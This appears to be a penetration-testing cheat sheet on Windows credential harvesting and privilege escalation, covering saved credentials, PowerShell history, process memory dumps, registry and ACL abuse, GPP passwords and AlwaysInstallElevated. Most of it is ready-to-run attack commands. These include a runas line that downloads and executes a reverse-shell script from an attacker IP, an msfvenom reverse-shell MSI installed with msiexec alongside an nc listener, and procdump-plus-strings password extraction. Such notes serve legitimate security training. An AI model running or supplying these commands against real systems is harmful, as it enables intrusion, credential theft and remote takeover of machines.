# Windows ## Unnattended Installation Unattend.xml is an answer file for installation. The files may contain encoded or plain-text credentials and other sensitive information. These files contain base64-encoded user account and system information * C:\Windows\Panther\Unattend.xml * C:\Windows\Panther\Autounattend.xml ## Windows Credential Manager In the production server for some operation, an admin requires to enter the credentials repeatedly. Also, users save their credentials to the Credential Manager for quick access. Credential manager stores Web and Windows Credentials. Assume that for a moment an attacker got access to the system physically or remotely. Then, it would be easy to access those credentials and to run an application with it. For checking al the stored credentials: ``` cmdkey /list ``` We will not see the password, but we can use runas to authenticate as the user which have credentials: {% code overflow="wrap" %} ``` runas.exe /savecred /user:administrator cmd // Hosting Nishang shell runas.exe /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/rev.ps1')" ``` {% endcode %} ## PowerShell History PowerShell.exe terminal stores all the PS commands history in a text file. When an administrator has used hard-coded credentials to perform any operation on the regular user i.e student user environment using PowerShell then, it would become necessary to clean the PowerShell command history. If an administrator forgets to clean up the history, then the admin user has exposed some sensitive information like credentials, configuration settings, etc. The default location for the PowerShell command history: {% code overflow="wrap" %} ``` C:\Users\Test\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` {% endcode %} {% code overflow="wrap" %} ``` type $env:AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` {% endcode %} ## Process Memory To check the processes running: ``` ps ``` Then you can dump all the proccess information: ``` // Search the pid ps | findstr "" .\procdump64.exe -accepteula -ma ``` Then use strings to check passwords: ``` strings | grep pass ``` ## Registry Autoruns Autoruns for system startup: ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunREG ``` Autoruns for user login ``` HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ``` Configurations for Windows Services which can run with elevated privileges ``` HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services ``` ### Enumeration To check the programs which are configured to start on system startup: ``` Get-ACL -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' | Format-List ``` If a normal user haves Full Control we can use as a privilege escalation technique ## ACLS We can check for ACL misconfigurations using icacls ``` icacls /path ``` If we have Full controll against a folder, we can grant this user permissions for accessing a file inside this folder using this command: ``` icacls file /grant user:f ``` ## SYSVOL & GPP (MS14-025) ``` findstr /S /I cpassword \\\sysvol\\policies\*.xml ``` ``` gpp-decrypt "password" ``` ## AlwayInstalled Enumerate common registry keys and if AlwaysInstallElevated is enabled we can exploit that {% tabs %} {% tab title="First Step" %} ``` reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer ``` {% endtab %} {% tab title="Second Step" %} Create a msfvenom payload: {% code overflow="wrap" %} ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST= lport=-a x64 --platform windows -f msi -o ignite.msi ``` {% endcode %} {% endtab %} {% tab title="Third Step" %} Upload the .msi file to the machine, open a listener and execute: ``` nc -nvlp ``` ``` msiexec /quiet /qn /i ignite.msi ``` {% endtab %} {% endtabs %}